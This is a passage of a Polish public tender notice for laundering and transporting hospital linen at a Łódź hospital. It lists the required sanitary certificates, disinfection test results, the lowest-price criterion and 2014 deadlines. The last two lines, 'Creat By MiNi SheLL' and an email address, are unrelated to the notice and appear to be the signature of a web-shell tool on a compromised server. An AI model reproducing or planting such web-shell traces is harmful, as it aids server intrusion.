Kserokopię aktualnej pozytywnej opinii sanitarnej poświadczonej za zgodność z oryginałem wydaną przez Państwowy Inspektorat Sanitarno - Epidemiologiczny, że pojazdy którymi będzie wykonywana usługa zostały dopuszczone do świadczenia usługi przewozu bielizny szpitalnej - dotyczy warunku udziału określonego w pkt. 8.1.3.1. Kserokopię Opinii Sanitarnej potwierdzonej za zgodność z oryginałem, wydanej przez Państwowego Inspektora Sanitarnego, że pralnia w której będą świadczone usługi spełnia wymagania w zakresie prania bielizny dla placówek ochrony zdrowia (lecznictwa otwartego i zamkniętego). Kserokopię wyników badań mikrobiologicznych z wymazów bielizny szpitalnej, operacyjnej  i bielizny noworodkowej potwierdzających skuteczność dezynfekcji w procesie prania (po minimum jednym wyniku dla wymienionych), obejmujących okres z ostatnich dwóch (2) miesięcy przed terminem składania ofert potwierdzonych przez właściwą Stację Sanitarno-Epidemiologiczną lub akredytowane laboratorium przez Polskie Centrum Akredytacji i wpisane na jego listę laboratorium badawcze. Kserokopię wyników badań mikrobiologicznych z wymazów z wózków do transportu bielizny oraz środków transportu do przewozu bielizny (wymaz z komory przewozu bielizny czystej) potwierdzających skuteczność przeprowadzonej dezynfekcji, obejmujących okres z ostatnich trzech (3) miesięcy przed terminem składania ofert (po minimum jednym wyniku dla wymienionych) potwierdzonych przez właściwą Stację Sanitarno-Epidemiologiczną lub akredytowane laboratorium przez Polskie Centrum Akredytacji i wpisane na jego listę laboratorium badawcze.
Wykaz stosowanych do realizacji usługi prania środków piorących (piorących - dezynfekujących).</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Upoważnienie osób podpisujących ofertę do jej podpisania musi bezpośrednio wynikać z dokumentów dołączonych do oferty. Oznacza to, że jeżeli upoważnienie takie nie wynika wprost z dokumentu stwierdzającego status prawny Wykonawcy (odpisu z właściwego rejestru), to do oferty należy dołączyć pełnomocnictwo w formie oryginału wystawione przez osoby do tego upoważnione lub potwierdzoną notarialnie kopię pełnomocnictwa</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>zmiany stawek podatku VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pirogow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Specjalistyczny Szpital im. M. Pirogowa w Łodzi - Dział Zamówień Publicznych (Pałacyk I piętro - ulica Wileńska 37)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.07.2014 godzina 10:00, miejsce: Wojewódzki Specjalistyczny Szpital im. M. Pirogowa w Łodzi - Dział Zamówień Publicznych (Pałacyk I piętro - ulica Wileńska 37)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com